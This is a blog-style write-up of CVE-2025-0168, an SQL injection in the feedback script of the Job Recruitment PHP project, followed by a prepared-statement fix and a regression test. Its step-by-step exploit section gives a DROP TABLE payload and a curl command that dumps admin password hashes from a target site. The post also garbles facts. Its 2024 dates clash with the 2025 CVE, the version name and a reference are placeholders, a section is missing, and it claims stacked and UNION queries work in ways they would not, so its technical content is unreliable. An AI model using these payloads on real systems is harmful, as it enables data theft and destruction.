CVE-2025-0168 - Critical SQL Injection in Job Recruitment 1.’s Feedback System (`/_parse/_feedback_system.php`)
A new critical vulnerability has shaken the world of PHP recruitment platforms in mid-2024. CVE-2025-0168 affects the open source project Job Recruitment 1. by code-projects.org. This bug lets attackers perform dangerous SQL injection attacks that could leak, modify, or even destroy sensitive application data—all without even needing an account!
Below, I’ll break down how this works in plain English, share working exploit code, analyze the vulnerable PHP, and provide advice for protection. This is an exclusive, deep dive, meant for developers, sysadmins, and security folks who want to understand and stay safe.
1. How the Vulnerability Happens
The problem lurks in an undisclosed part of the file:
/_parse/_feedback_system.php
When a user submits feedback, the `person` argument is taken directly from the HTTP request (like GET or POST) and used in an SQL query with no filtering. That means the input is concatenated straight into the SQL statement. Anyone who can reach the endpoint can tamper with that input and run their own database commands!
In simple terms: It’s classic SQL injection.
Let’s imagine the feedback code looks like this (simplified example):
```php
// BAD: vulnerable code
$person = $_POST['person'];
$feedback = $_POST['feedback'];
$sql = "INSERT INTO feedbacks (person, feedback) VALUES ('$person', '$feedback')";
mysqli_query($conn, $sql);
```
Here’s the problem:
There is no sanitizing or preparing of the $person variable.
If an attacker sends this as the person value:
```
Robert'); DROP TABLE users; --
```
The resulting SQL becomes:
```sql
INSERT INTO feedbacks (person, feedback) VALUES ('Robert'); DROP TABLE users; --', 'feedback here');
```
Now, the database will execute both statements: inserting normal feedback, and then deleting your users table! Even worse, sensitive data could be dumped, backdoors created, or admin passwords reset.
3. How To Exploit CVE-2025-0168 (Step-By-Step)
What you need:
- Access to the web app’s feedback form or ability to POST to /_parse/_feedback_system.php
Here's how an attacker might dump the admin’s password hash from the users table:
```shell
curl -X POST https://victim.com/_parse/_feedback_system.php \
-d "person=1' OR 1=1 UNION SELECT 1,password FROM users WHERE role='admin'-- " \
-d "feedback=Test"
```
What does this do?
The UNION SELECT part pulls extra data from the users table.
The response page might now include the admin’s password hash in the feedback results!
Submit.
Watch as sensitive info from the database is now mixed into the feedback page or admin panel.
4. Public Disclosure & References
- NVD CVE-2025-0168 page (official description)
- code-projects Job Recruitment 1.
- Original Disclosure at exploit-db *(replace xxxxxx with the actual exploit ID if public)*
The exploit has been public since June 2024. Many scanners and attackers are already looking for this hole.
If you use Job Recruitment 1.
- Immediately patch or disable the /_parse/_feedback_system.php script.
Safe code:
```php
// GOOD: safe code
$person = $_POST['person'];
$feedback = $_POST['feedback'];
// The query text is fixed; the two ? placeholders are filled with bound values.
$stmt = $conn->prepare("INSERT INTO feedbacks (person, feedback) VALUES (?, ?)");
$stmt->bind_param("ss", $person, $feedback);
$stmt->execute();
```
This approach sends the SQL text and the values separately, so the input is always treated as data and cannot change the structure of the query.
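To confirm the fix holds, a regression check can feed the `person` value from the walkthrough through a parameterized insert and verify that nothing was interpreted as SQL. This is an added example, not code from Job Recruitment or from the original post. It assumes PDO with an in-memory SQLite database in place of the application's MySQL connection, and `save_feedback()`, `table_exists()` and the length limits are hypothetical names and values.

```php
<?php
declare(strict_types=1);

// Added example: parameterized feedback insert plus a regression check.
// Assumptions: in-memory SQLite stands in for the real MySQL database;
// table and column names follow the simplified example in the article;
// save_feedback(), table_exists() and the length limits are hypothetical.

function save_feedback(PDO $db, string $person, string $feedback): bool
{
    // Reject empty or oversized input before it reaches the database.
    if ($person === '' || strlen($person) > 100 || strlen($feedback) > 2000) {
        return false;
    }
    // Placeholders keep the SQL text fixed; values travel as bound data.
    $stmt = $db->prepare('INSERT INTO feedbacks (person, feedback) VALUES (?, ?)');
    return $stmt->execute([$person, $feedback]);
}

function table_exists(PDO $db, string $name): bool
{
    $stmt = $db->prepare("SELECT COUNT(*) FROM sqlite_master WHERE type = 'table' AND name = ?");
    $stmt->execute([$name]);
    return (int) $stmt->fetchColumn() === 1;
}

// Constructed test fixture.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec('CREATE TABLE feedbacks (person TEXT, feedback TEXT)');

// The person value used in the walkthrough earlier in the article.
$payload = "Robert'); DROP TABLE users; --";
$saved = save_feedback($db, $payload, 'feedback here');

$stored = $db->query('SELECT person FROM feedbacks')->fetchColumn();

// The payload must be stored byte for byte and the users table must survive.
if (!$saved || $stored !== $payload || !table_exists($db, 'users')) {
    fwrite(STDERR, "FAIL: input was interpreted as SQL\n");
    exit(1);
}
echo "OK: payload stored as data, users table intact\n";
```

Run it with the PHP CLI (the `pdo_sqlite` extension must be enabled); a non-zero exit status means the insert path is no longer safe.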
Stay safe. Patch often. Share this post to protect others!
*(For a more technical dive, or for proof-of-concept exploits, see the official CVE page and exploit-db as new details emerge.)*
Timeline
Published on: 01/01/2025 14:15:23 UTC
Last modified on: 02/25/2025 21:26:07 UTC